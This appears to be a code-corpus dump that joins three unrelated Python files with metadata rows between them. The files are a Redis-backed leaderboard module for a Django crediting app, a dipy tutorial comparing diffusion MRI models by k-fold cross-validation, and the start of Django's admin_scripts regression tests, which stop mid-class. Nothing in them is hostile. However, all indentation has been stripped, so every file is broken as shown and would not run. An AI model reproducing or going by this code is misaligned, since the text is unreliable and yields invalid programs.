# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
################################################################
import json
import time
import logging
from django.conf import settings
from creditpiggy.core.redis import share_redis_connection
from creditpiggy.core.models import *
"""
from creditpiggy.core.leaderboard import *
from creditpiggy.core.models import *
u = PiggyProject.objects.all()[0]
leaderboard_project(u)
"""
####################################
# Leaderboard functions
####################################
def _objectify_ranking( scores, item_class, item=None ):
"""
Create model objects representing the items in the score list specified
NOTE: This fucntion requires the enriched version of scores list, using
the tuple format: (uid, score, rank)
"""
# Extract item IDs
uid_score_rank = {}
uid_list = []
for uid, score, rank in scores:
# Skip me from the list
if (item is None) or (int(uid) != item.id):
uid_list.append( uid )
# Update score and rank
uid_score_rank[int(uid)] = (score, rank)
# Feth objects of every other item
items = []
for i in item_class.objects.filter(id__in=uid_list):
# Get item object, extended with score and ranking
d = to_dict( i )
(d['score'], d['rank']) = uid_score_rank[i.id]
# None of these is me
d['me'] = False
items.append(d)
# Now add the pivot item in the list
if not item is None:
d = to_dict( item )
(d['score'], d['rank']) = uid_score_rank[item.id]
d['me'] = True
items.append(d)
# Sort by score descending
items.sort( lambda a,b: int(b['score'] * 1000000) - int(a['score'] * 1000000) )
# Return items
return items
def _key_rank_around( key, item, item_class, num_range=100, base=1 ):
"""
Return the neighborhood ranking range under the specified key
"""
# Get multiple items with pipeline
redis = share_redis_connection()
revrank = redis.zrevrank(
"%s%s" % (settings.REDIS_KEYS_PREFIX, key),
item.id
)
# If missing return None
if revrank is None:
return None
# Get neighborhood bounds
n_before = int(num_range/2)
n_after = num_range - n_before - 1
# Clip upper bound
if (revrank - n_before) < 0:
delta = n_before- revrank
n_before -= delta
n_after += delta
# Get user ranking with score
scores = redis.zrevrange(
"%s%s" % (settings.REDIS_KEYS_PREFIX, key),
revrank - n_before,
revrank + n_after,
withscores=True
)
# Enrich with ranking index
ranks = range( revrank - n_before, revrank + n_after + 1 )
scores = [ scores[i] + (ranks[i] + base,) for i in range(0,len(scores)) ]
# Create objects from the rank IDs
return _objectify_ranking( scores, item_class, item )
def _key_rank_top( key, item_class, num_range=100, base=1 ):
"""
Return the first num_range items from the specified rank-ordered list
"""
# Return a range of items
redis = share_redis_connection()
scores = redis.zrevrange(
"%s%s" % (settings.REDIS_KEYS_PREFIX, key),
0,
num_range - 1,
withscores=True,
)
# If scores is empty or None, return None
if not scores:
return None
# Enrich with ranking index
ranks = range(0, num_range)
scores = [ scores[i] + (ranks[i] + base,) for i in range(0,len(scores)) ]
# Objectify
return _objectify_ranking( scores, item_class )
####################################
# Per entity details
####################################
def leaderboard_user(user, num_range=50, base=1):
"""
Get leaderboard of the specified user
"""
# Return leaderboard neighborhood of users
return _key_rank_around( "rank/users", user, PiggyUser, num_range, base )
def leaderboard_project(project, num_range=50, base=1):
"""
Get leaderboard of the specified project
"""
# Return leaderboard neighborhood of projects
return _key_rank_around( "rank/projects", project, PiggyProject, num_range, base )
def leaderboard_user_campaign(user_campaign, num_range=50, base=1):
"""
Get leaderboard of the specified user's contribution to a campaign
"""
# Return leaderboard neighborhood of projects
return _key_rank_around( "rank/campaign/%i/users" % user_campaign.campaign.id, user_campaign.user, PiggyUser, num_range, base )
def leaderboard_user_project(user_project, num_range=50, base=1):
"""
Get leaderboard of the specified user's contribution to project
"""
# Return leaderboard neighborhood of projects
return _key_rank_around( "rank/project/%i/users" % user_project.project.id, user_project.user, PiggyUser, num_range, base )
####################################
# Overall details
####################################
def leaderboard_users(num_range=100, base=1):
"""
Get leaderboard of top users
"""
# Return leaderboard neighborhood of users
return _key_rank_top( "rank/users", PiggyUser, num_range, base )
def leaderboard_projects(num_range=100, base=1):
"""
Get leaderboard of top projects
"""
# Return leaderboard neighborhood of projects
return _key_rank_top( "rank/projects", PiggyProject, num_range, base )
def leaderboard_users_campaign(campaign, num_range=100, base=1):
"""
Get leaderboard of top user's contribution to a campaign
"""
# Return leaderboard neighborhood of projects
return _key_rank_top( "rank/campaign/%i/users" % campaign.id, PiggyUser, num_range, base )
def leaderboard_users_project(project, num_range=100, base=1):
"""
Get leaderboard of top user's contribution to project
"""
# Return leaderboard neighborhood of projects
return _key_rank_top( "rank/project/%i/users" % project.id, PiggyUser, num_range, base )
####################################
# Merge various leaderboard values
####################################
def merge_leaderboards(leaderboards):
"""
Merge individual leaderboard result
"""
pass
| gpl-2.0 | 5,628,117,936,112,530,000 | 26.858974 | 128 | 0.663752 | false |
UCL-CS35/incdb-poc | venv/share/doc/dipy/examples/kfold_xval.py | 17 | 5617 | """
============================================
K-fold cross-validation for model comparison
============================================
Different models of diffusion MRI can be compared based on their accuracy in
fitting the diffusion signal. Here, we demonstrate this by comparing two
models: the diffusion tensor model (DTI) and constrained spherical
deconvolution (CSD). These models differ from each other substantially. DTI
approximates the diffusion pattern as a 3D Gaussian distribution, and has only
6 free parameters. CSD, on the other hand, fits many more parameters. The
models aare also not nested, so they cannot be compared using the
log-likelihood ratio.
A general way to perform model comparison is cross-validation [Hastie2008]_. In
this method, a model is fit to some of the data (a *learning set*) and the
model is then used to predict a held-out set (a *testing set*). The model
predictions can then be compared to estimate prediction error on the held out
set. This method has been used for comparison of models such as DTI and CSD
[Rokem2014]_, and has the advantage that it the comparison is imprevious to
differences in the number of parameters in the model, and it can be used to
compare models that are not nested.
In `dipy`, we include an implementation of k-fold cross-validation. In this
method, the data is divided into $k$ different segments. In each iteration
$\frac{1}{k}th$ of the data is held out and the model is fit to the other
$\frac{k-1}{k}$ parts of the data. A prediction of the held out data is done
and recorded. At the end of $k$ iterations a prediction of all of the data will
have been conducted, and this can be compared directly to all of the data.
First, we import that modules needed for this example. In particular, the
:mod:`reconst.cross_validation` module implements k-fold cross-validation
"""
import numpy as np
np.random.seed(2014)
import matplotlib.pyplot as plt
import dipy.data as dpd
import dipy.reconst.cross_validation as xval
import dipy.reconst.dti as dti
import dipy.reconst.csdeconv as csd
import scipy.stats as stats
"""
We fetch some data and select a couple of voxels to perform comparisons on. One
lies in the corpus callosum (cc), while the other is in the centrum semiovale
(cso), a part of the brain known to contain multiple crossing white matter
fiber populations.
"""
dpd.fetch_stanford_hardi()
img, gtab = dpd.read_stanford_hardi()
data = img.get_data()
cc_vox = data[40, 70, 38]
cso_vox = data[30, 76, 38]
"""
We initialize each kind of model:
"""
dti_model = dti.TensorModel(gtab)
response, ratio = csd.auto_response(gtab, data, roi_radius=10, fa_thr=0.7)
csd_model = csd.ConstrainedSphericalDeconvModel(gtab, response)
"""
Next, we perform cross-validation for each kind of model, comparing model
predictions to the diffusion MRI data in each one of these voxels.
Note that we use 2-fold cross-validation, which means that in each iteration,
the model will be fit to half of the data, and used to predict the other half.
"""
dti_cc = xval.kfold_xval(dti_model, cc_vox, 2)
csd_cc = xval.kfold_xval(csd_model, cc_vox, 2, response)
dti_cso = xval.kfold_xval(dti_model, cso_vox, 2)
csd_cso = xval.kfold_xval(csd_model, cso_vox, 2, response)
"""
We plot a scatter plot of the data with the model predictions in each of these
voxels, focusing only on the diffusion-weighted measurements (each point
corresponds to a different gradient direction). The two models are compared in
each sub-plot (blue=DTI, red=CSD).
"""
fig, ax = plt.subplots(1,2)
fig.set_size_inches([12,6])
ax[0].plot(cc_vox[~gtab.b0s_mask], dti_cc[~gtab.b0s_mask], 'o', color='b')
ax[0].plot(cc_vox[~gtab.b0s_mask], csd_cc[~gtab.b0s_mask], 'o', color='r')
ax[1].plot(cso_vox[~gtab.b0s_mask], dti_cso[~gtab.b0s_mask], 'o', color='b', label='DTI')
ax[1].plot(cso_vox[~gtab.b0s_mask], csd_cso[~gtab.b0s_mask], 'o', color='r', label='CSD')
plt.legend(loc='upper left')
for this_ax in ax:
this_ax.set_xlabel('Data (relative to S0)')
this_ax.set_ylabel('Model prediction (relative to S0)')
fig.savefig("model_predictions.png")
"""
.. figure:: model_predictions.png
:align: center
**Model predictions**.
"""
"""
We can also quantify the goodness of fit of the models by calculating an
R-squared score:
"""
cc_dti_r2=stats.pearsonr(cc_vox[~gtab.b0s_mask], dti_cc[~gtab.b0s_mask])[0]**2
cc_csd_r2=stats.pearsonr(cc_vox[~gtab.b0s_mask], csd_cc[~gtab.b0s_mask])[0]**2
cso_dti_r2=stats.pearsonr(cso_vox[~gtab.b0s_mask], dti_cso[~gtab.b0s_mask])[0]**2
cso_csd_r2=stats.pearsonr(cso_vox[~gtab.b0s_mask], csd_cso[~gtab.b0s_mask])[0]**2
print("Corpus callosum\n"
"DTI R2 : %s\n"
"CSD R2 : %s\n"
"\n"
"Centrum Semiovale\n"
"DTI R2 : %s\n"
"CSD R2 : %s\n" % (cc_dti_r2, cc_csd_r2, cso_dti_r2, cso_csd_r2))
"""
This should look something like this::
Corpus callosum
DTI R2 : 0.782881752597
CSD R2 : 0.805764364116
Centrum Semiovale
DTI R2 : 0.431921832012
CSD R2 : 0.604806420501
As you can see, DTI is a pretty good model for describing the signal in the CC,
while CSD is much better in describing the signal in regions of multiple
crossing fibers.
References
----------
.. [Hastie2008] Hastie, T., Tibshirani, R., Friedman, J. (2008). The Elements
of Statistical Learning: Data Mining, Inference and
Prediction. Springer-Verlag, Berlin
.. [Rokem2014] Rokem, A., Chan, K.L. Yeatman, J.D., Pestilli, F., Mezer, A.,
Wandell, B.A., 2014. Evaluating the accuracy of diffusion models at multiple
b-values with cross-validation. ISMRM 2014.
.. include:: ../links_names.inc
"""
| bsd-2-clause | -1,150,741,619,367,538,800 | 30.914773 | 89 | 0.713904 | false |
eneldoserrata/marcos_openerp | addons/report_geraldo/lib/geraldo/site/newsite/django_1_0/tests/regressiontests/admin_scripts/tests.py | 9 | 44012 | """
A series of tests to establish that the command-line managment tools work as
advertised - especially with regards to the handling of the DJANGO_SETTINGS_MODULE
and default settings.py files.
"""
import os
import unittest
import shutil
import sys
from django import conf, bin, get_version
from django.conf import settings
class AdminScriptTestCase(unittest.TestCase):
def write_settings(self, filename, apps=None):
test_dir = os.path.dirname(os.path.dirname(__file__))
settings_file = open(os.path.join(test_dir,filename), 'w')
settings_file.write('# Settings file automatically generated by regressiontests.admin_scripts test case\n')
exports = [
'DATABASE_ENGINE',
'DATABASE_NAME',
'DATABASE_USER',
'DATABASE_PASSWORD',
'DATABASE_HOST',
'DATABASE_PORT',
'ROOT_URLCONF'
]
for s in exports:
if hasattr(settings,s):
settings_file.write("%s = '%s'\n" % (s, str(getattr(settings,s))))
if apps is None:
apps = ['django.contrib.auth', 'django.contrib.contenttypes', 'admin_scripts']
if apps:
settings_file.write("INSTALLED_APPS = %s\n" % apps)
settings_file.close()
def remove_settings(self, filename):
test_dir = os.path.dirname(os.path.dirname(__file__))
os.remove(os.path.join(test_dir, filename))
# Also try to remove the pyc file; if it exists, it could
# mess up later tests that depend upon the .py file not existing
try:
os.remove(os.path.join(test_dir, filename + 'c'))
except OSError:
pass
def run_test(self, script, args, settings_file=None, apps=None):
test_dir = os.path.dirname(os.path.dirname(__file__))
project_dir = os.path.dirname(test_dir)
base_dir = os.path.dirname(project_dir)
# Build the command line
cmd = '%s "%s"' % (sys.executable, script)
cmd += ''.join([' %s' % arg for arg in args])
# Remember the old environment
old_django_settings_module = os.environ.get('DJANGO_SETTINGS_MODULE', None)
old_python_path = os.environ.get('PYTHONPATH', None)
old_cwd = os.getcwd()
# Set the test environment
if settings_file:
os.environ['DJANGO_SETTINGS_MODULE'] = settings_file
elif 'DJANGO_SETTINGS_MODULE' in os.environ:
del os.environ['DJANGO_SETTINGS_MODULE']
os.environ['PYTHONPATH'] = os.pathsep.join([test_dir,base_dir])
# Move to the test directory and run
os.chdir(test_dir)
stdin, stdout, stderr = os.popen3(cmd)
out, err = stdout.read(), stderr.read()
# Restore the old environment
if old_django_settings_module:
os.environ['DJANGO_SETTINGS_MODULE'] = old_django_settings_module
if old_python_path:
os.environ['PYTHONPATH'] = old_python_path
# Move back to the old working directory
os.chdir(old_cwd)
return out, err
def run_django_admin(self, args, settings_file=None):
bin_dir = os.path.dirname(bin.__file__)
return self.run_test(os.path.join(bin_dir,'django-admin.py'), args, settings_file)
def run_manage(self, args, settings_file=None):
conf_dir = os.path.dirname(conf.__file__)
template_manage_py = os.path.join(conf_dir, 'project_template', 'manage.py')
test_dir = os.path.dirname(os.path.dirname(__file__))
test_manage_py = os.path.join(test_dir, 'manage.py')
shutil.copyfile(template_manage_py, test_manage_py)
stdout, stderr = self.run_test('./manage.py', args, settings_file)
# Cleanup - remove the generated manage.py script
os.remove(test_manage_py)
return stdout, stderr
def assertNoOutput(self, stream):
"Utility assertion: assert that the given stream is empty"
self.assertEquals(len(stream), 0, "Stream should be empty: actually contains '%s'" % stream)
def assertOutput(self, stream, msg):
"Utility assertion: assert that the given message exists in the output"
self.failUnless(msg in stream, "'%s' does not match actual output text '%s'" % (msg, stream))
##########################################################################
# DJANGO ADMIN TESTS
# This first series of test classes checks the environment processing
# of the django-admin.py script
##########################################################################
class DjangoAdminNoSettings(AdminScriptTestCase):
"A series of tests for django-admin.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_bad_settings(self):
"no settings: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"no settings: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
class DjangoAdminDefaultSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"default: django-admin builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"default: django-admin builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"default: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"default: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"default: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"default: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"default: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminMinimalSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"minimal: django-admin builtin commands fail if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_environment(self):
"minimal: django-admin builtin commands fail if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_bad_settings(self):
"minimal: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"minimal: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"minimal: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"minimal: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminAlternateSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"alternate: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"alternate: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"alternate: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class DjangoAdminMultipleSettings(AdminScriptTestCase):
"""A series of tests for django-admin.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: django-admin builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, 'environment variable DJANGO_SETTINGS_MODULE is undefined')
def test_builtin_with_settings(self):
"alternate: django-admin builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"alternate: django-admin builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"alternate: django-admin builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_django_admin(args)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"alternate: django-admin builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_django_admin(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_custom_command(self):
"alternate: django-admin can't execute user commands"
args = ['noargs_command']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"alternate: django-admin can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_django_admin(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"alternate: django-admin can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_django_admin(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
##########################################################################
# MANAGE.PY TESTS
# This next series of test classes checks the environment processing
# of the generated manage.py script
##########################################################################
class ManageNoSettings(AdminScriptTestCase):
"A series of tests for manage.py when there is no settings.py file."
def test_builtin_command(self):
"no settings: manage.py builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_settings(self):
"no settings: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_environment(self):
"no settings: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
class ManageDefaultSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
contains the test application.
"""
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"default: manage.py builtin commands succeed when default settings are appropriate"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_settings(self):
"default: manage.py builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"default: manage.py builtin commands succeed if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_bad_settings(self):
"default: manage.py builtin commands succeed if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"default: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_custom_command(self):
"default: manage.py can execute user commands when default settings are appropriate"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
def test_custom_command_with_settings(self):
"default: manage.py can execute user commands when settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
def test_custom_command_with_environment(self):
"default: manage.py can execute user commands when settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
class ManageMinimalSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings.py file that
doesn't contain the test application.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
def tearDown(self):
self.remove_settings('settings.py')
def test_builtin_command(self):
"minimal: manage.py builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_settings(self):
"minimal: manage.py builtin commands fail if settings are provided as argument"
args = ['sqlall','--settings=settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_environment(self):
"minimal: manage.py builtin commands fail if settings are provided in the environment"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_builtin_with_bad_settings(self):
"minimal: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"minimal: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found')
def test_custom_command(self):
"minimal: manage.py can't execute user commands without appropriate settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"minimal: manage.py can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=settings']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_environment(self):
"minimal: manage.py can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
class ManageAlternateSettings(AdminScriptTestCase):
"""A series of tests for manage.py when using a settings file
with a name other than 'settings.py'.
"""
def setUp(self):
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"alternate: manage.py builtin commands fail with an import error when no default settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_settings(self):
"alternate: manage.py builtin commands fail if settings are provided as argument but no defaults"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_environment(self):
"alternate: manage.py builtin commands fail if settings are provided in the environment but no defaults"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_settings(self):
"alternate: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_builtin_with_bad_environment(self):
"alternate: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_custom_command(self):
"alternate: manage.py can't execute user commands"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_custom_command_with_settings(self):
